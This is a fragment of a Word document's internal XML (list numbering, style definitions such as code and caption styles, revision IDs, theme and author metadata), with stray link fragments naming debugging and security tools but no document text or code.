      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B9C8AA6C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5C280422" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C5EA4BD6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E828E3CE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="02689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53B78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08D2D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46D81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53A0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D17CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="959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9F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B976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58F7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3098D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6E2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05D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57EB5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A11EF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423CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="935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771C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34422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59345">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="943420220">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1307778227">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="179399477">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1771926285">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1507328887">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1175800143">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="997269300">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1869294881">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1533112726">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1410889122">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1785688284">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1095514520">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1992635374">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="944189428">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="519705859">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1000622284">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="490099929">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1298758074">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1162740168">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="569730438">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1879076883">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="609778989">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="840655966">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="488400956">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="989753139">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="570844534">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="355547681">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="530149795">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="882446674">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="20215425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2E"/>
    <w:rsid w:val="00011DBA"/>
    <w:rsid w:val="00033EC8"/>
    <w:rsid w:val="00037539"/>
    <w:rsid w:val="00055045"/>
    <w:rsid w:val="00056C3E"/>
    <w:rsid w:val="0007438F"/>
    <w:rsid w:val="00087743"/>
    <w:rsid w:val="000950D9"/>
    <w:rsid w:val="000A4289"/>
    <w:rsid w:val="000C7432"/>
    <w:rsid w:val="000E2AB3"/>
    <w:rsid w:val="000F56D3"/>
    <w:rsid w:val="00111129"/>
    <w:rsid w:val="00111E36"/>
    <w:rsid w:val="00115EE2"/>
    <w:rsid w:val="001215EC"/>
    <w:rsid w:val="00124941"/>
    <w:rsid w:val="001330E3"/>
    <w:rsid w:val="0013450B"/>
    <w:rsid w:val="0014334F"/>
    <w:rsid w:val="00150680"/>
    <w:rsid w:val="00175E22"/>
    <w:rsid w:val="00183FB3"/>
    <w:rsid w:val="001911E4"/>
    <w:rsid w:val="001D6E6B"/>
    <w:rsid w:val="001E55F8"/>
    <w:rsid w:val="00200143"/>
    <w:rsid w:val="0020271E"/>
    <w:rsid w:val="002076EB"/>
    <w:rsid w:val="00220214"/>
    <w:rsid w:val="00225AF6"/>
    <w:rsid w:val="002318B9"/>
    <w:rsid w:val="002333BA"/>
    <w:rsid w:val="00244E22"/>
    <w:rsid w:val="00250115"/>
    <w:rsid w:val="002518AE"/>
    <w:rsid w:val="00252A48"/>
    <w:rsid w:val="002706E0"/>
    <w:rsid w:val="00276E81"/>
    <w:rsid w:val="002943DD"/>
    <w:rsid w:val="002C5863"/>
    <w:rsid w:val="002C6421"/>
    <w:rsid w:val="002E07CE"/>
    <w:rsid w:val="002E0856"/>
    <w:rsid w:val="00317DD7"/>
    <w:rsid w:val="0032484C"/>
    <w:rsid w:val="00335D96"/>
    <w:rsid w:val="00336FE0"/>
    <w:rsid w:val="00343A40"/>
    <w:rsid w:val="0034742C"/>
    <w:rsid w:val="003719FB"/>
    <w:rsid w:val="003C17E2"/>
    <w:rsid w:val="003C219B"/>
    <w:rsid w:val="003E04D1"/>
    <w:rsid w:val="003F639E"/>
    <w:rsid w:val="00400385"/>
    <w:rsid w:val="0041691D"/>
    <w:rsid w:val="00433718"/>
    <w:rsid w:val="00437E81"/>
    <w:rsid w:val="00450D41"/>
    <w:rsid w:val="00455A9D"/>
    <w:rsid w:val="00485B13"/>
    <w:rsid w:val="004956AA"/>
    <w:rsid w:val="00496D0E"/>
    <w:rsid w:val="004C6F13"/>
    <w:rsid w:val="004E111C"/>
    <w:rsid w:val="004F68CB"/>
    <w:rsid w:val="005264D0"/>
    <w:rsid w:val="0052786E"/>
    <w:rsid w:val="00542A1D"/>
    <w:rsid w:val="00547413"/>
    <w:rsid w:val="00551964"/>
    <w:rsid w:val="00555F5B"/>
    <w:rsid w:val="00556133"/>
    <w:rsid w:val="0055639E"/>
    <w:rsid w:val="0056593D"/>
    <w:rsid w:val="00567B5C"/>
    <w:rsid w:val="00581DBE"/>
    <w:rsid w:val="00581FB9"/>
    <w:rsid w:val="0058427B"/>
    <w:rsid w:val="005A6340"/>
    <w:rsid w:val="005D1352"/>
    <w:rsid w:val="005D3AC9"/>
    <w:rsid w:val="005E496E"/>
    <w:rsid w:val="0061682E"/>
    <w:rsid w:val="00622F5C"/>
    <w:rsid w:val="00623886"/>
    <w:rsid w:val="0062558E"/>
    <w:rsid w:val="00646037"/>
    <w:rsid w:val="00663942"/>
    <w:rsid w:val="006776BD"/>
    <w:rsid w:val="006903D1"/>
    <w:rsid w:val="006A0B0C"/>
    <w:rsid w:val="006C5C9E"/>
    <w:rsid w:val="006E5D6F"/>
    <w:rsid w:val="006E75C0"/>
    <w:rsid w:val="006F5E52"/>
    <w:rsid w:val="00707178"/>
    <w:rsid w:val="007111FE"/>
    <w:rsid w:val="00712CB9"/>
    <w:rsid w:val="00724956"/>
    <w:rsid w:val="00727036"/>
    <w:rsid w:val="007431EA"/>
    <w:rsid w:val="007506C7"/>
    <w:rsid w:val="00752C47"/>
    <w:rsid w:val="00767735"/>
    <w:rsid w:val="00795B79"/>
    <w:rsid w:val="007B3BA5"/>
    <w:rsid w:val="007B579A"/>
    <w:rsid w:val="007B5BF7"/>
    <w:rsid w:val="007E1592"/>
    <w:rsid w:val="007F755A"/>
    <w:rsid w:val="008005E2"/>
    <w:rsid w:val="00840BBB"/>
    <w:rsid w:val="00844825"/>
    <w:rsid w:val="00884BFC"/>
    <w:rsid w:val="00884CD5"/>
    <w:rsid w:val="008912FE"/>
    <w:rsid w:val="00893083"/>
    <w:rsid w:val="00894F5A"/>
    <w:rsid w:val="008C4153"/>
    <w:rsid w:val="008C4490"/>
    <w:rsid w:val="008C4B44"/>
    <w:rsid w:val="008D5AF3"/>
    <w:rsid w:val="009240CB"/>
    <w:rsid w:val="009571A6"/>
    <w:rsid w:val="00996A5D"/>
    <w:rsid w:val="00996E4A"/>
    <w:rsid w:val="009A100A"/>
    <w:rsid w:val="009B0E35"/>
    <w:rsid w:val="009C1C11"/>
    <w:rsid w:val="009C27BB"/>
    <w:rsid w:val="009F3B92"/>
    <w:rsid w:val="00A154A9"/>
    <w:rsid w:val="00A23916"/>
    <w:rsid w:val="00A26E1B"/>
    <w:rsid w:val="00A30EF8"/>
    <w:rsid w:val="00A34711"/>
    <w:rsid w:val="00A44D04"/>
    <w:rsid w:val="00A65435"/>
    <w:rsid w:val="00AB0599"/>
    <w:rsid w:val="00AC02C3"/>
    <w:rsid w:val="00AC67FD"/>
    <w:rsid w:val="00AE6477"/>
    <w:rsid w:val="00AF55AB"/>
    <w:rsid w:val="00AF642F"/>
    <w:rsid w:val="00B00365"/>
    <w:rsid w:val="00B0080A"/>
    <w:rsid w:val="00B01FDA"/>
    <w:rsid w:val="00B2426F"/>
    <w:rsid w:val="00B32A19"/>
    <w:rsid w:val="00B35B88"/>
    <w:rsid w:val="00B40A5B"/>
    <w:rsid w:val="00B47DC6"/>
    <w:rsid w:val="00B51413"/>
    <w:rsid w:val="00B51483"/>
    <w:rsid w:val="00B920E2"/>
    <w:rsid w:val="00BA5F4C"/>
    <w:rsid w:val="00BF1F81"/>
    <w:rsid w:val="00BF2359"/>
    <w:rsid w:val="00C03931"/>
    <w:rsid w:val="00C0551F"/>
    <w:rsid w:val="00C30C78"/>
    <w:rsid w:val="00C31DCD"/>
    <w:rsid w:val="00C32533"/>
    <w:rsid w:val="00C528B6"/>
    <w:rsid w:val="00C566FB"/>
    <w:rsid w:val="00C56DB6"/>
    <w:rsid w:val="00C6225E"/>
    <w:rsid w:val="00C63F04"/>
    <w:rsid w:val="00C670F2"/>
    <w:rsid w:val="00C677DB"/>
    <w:rsid w:val="00C85002"/>
    <w:rsid w:val="00CA4C6E"/>
    <w:rsid w:val="00CC110D"/>
    <w:rsid w:val="00CF3BF6"/>
    <w:rsid w:val="00D139EB"/>
    <w:rsid w:val="00D21F47"/>
    <w:rsid w:val="00D22A7D"/>
    <w:rsid w:val="00D36E2B"/>
    <w:rsid w:val="00D663A7"/>
    <w:rsid w:val="00D70417"/>
    <w:rsid w:val="00D847D3"/>
    <w:rsid w:val="00DA733E"/>
    <w:rsid w:val="00DA7649"/>
    <w:rsid w:val="00DB49B6"/>
    <w:rsid w:val="00DD64D1"/>
    <w:rsid w:val="00E01DB7"/>
    <w:rsid w:val="00E03870"/>
    <w:rsid w:val="00E07CD2"/>
    <w:rsid w:val="00E132E9"/>
    <w:rsid w:val="00E23C61"/>
    <w:rsid w:val="00E34796"/>
    <w:rsid w:val="00E7302F"/>
    <w:rsid w:val="00E73F01"/>
    <w:rsid w:val="00E74675"/>
    <w:rsid w:val="00EB2EDB"/>
    <w:rsid w:val="00EB4C33"/>
    <w:rsid w:val="00EB5499"/>
    <w:rsid w:val="00EC23F2"/>
    <w:rsid w:val="00EE1E0C"/>
    <w:rsid w:val="00F04A40"/>
    <w:rsid w:val="00F3034E"/>
    <w:rsid w:val="00F351BE"/>
    <w:rsid w:val="00F369E3"/>
    <w:rsid w:val="00F62F5D"/>
    <w:rsid w:val="00F66181"/>
    <w:rsid w:val="00FA052B"/>
    <w:rsid w:val="00FC1E78"/>
    <w:rsid w:val="00FD4229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91A87"/>
  <w15:docId w15:val="{7450777B-52D1-4731-AF06-840638C3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0E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2D3A" w:themeColor="tex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0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DB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82E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table" w:styleId="GridTable4-Accent2">
    <w:name w:val="Grid Table 4 Accent 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="0061682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">
    <w:name w:val="Grid Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="006168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168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8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682E"/>
    <w:rPr>
      <w:color w:val="192D3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3C61"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="192D3A" w:themeColor="tex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229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table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0066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59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3479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C4B44"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ListTable4">
    <w:name w:val="List Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="005264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64D0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Style1">
    <w:name w:val="Style1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005264D0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000000" w:themeFill="text1"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="595959" w:themeFill="text1" w:themeFillTint="A6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D1EEF9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7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FB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0037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FB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00646037"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1481AB" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeChar"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="007111FE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045"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="007111FE"/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055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045"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="omittedforbrevity">
    <w:name w:val="omitted for brevity"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="omittedforbrevityChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:color w:val="0070C0"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Important">
    <w:name w:val="Important"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="ImportantChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C00000"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="omittedforbrevityChar">
    <w:name w:val="omitted for brevity Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="omittedforbrevity"/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BoxCode">
    <w:name w:val="Box Code"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="BoxCodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ImportantChar">
    <w:name w:val="Important Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="Important"/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C00000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BoxCodeChar">
    <w:name w:val="Box Code Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="BoxCode"/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"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84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-Cap">
    <w:name w:val="Fig-Cap"/>
    <w:basedOn w:val="NormalWeb"/>
    <w:link w:val="Fig-CapChar"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00111129"/>
    <w:pPr>
      <w:spacing w:before="0" w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs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2E0856"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Fig-CapChar">
    <w:name w:val="Fig-Cap Char"/>
    <w:basedOn w:val="NormalWebChar"/>
    <w:link w:val="Fig-Cap"/>
    <w:rsid w:val="00111129"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAns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27BB"/>
    <w:rPr>
      <w:color w:val="1367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Gallopsled/pwntoo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cat.sourceforge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hidra-sr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nu.org/software/gdb/gdb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v9443@ny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etropolitan">
  <a:themeElements>
    <a:clrScheme name="Custom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192D3A"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="13676B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2FAB-7DC8-4537-A911-C8FF1F30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5</Pages>
  <Words>5228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Von Tish</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lindsay Von Tish</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <cp:lastPrinted>2024-02-22T00:56:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-26T22:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-27T23:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>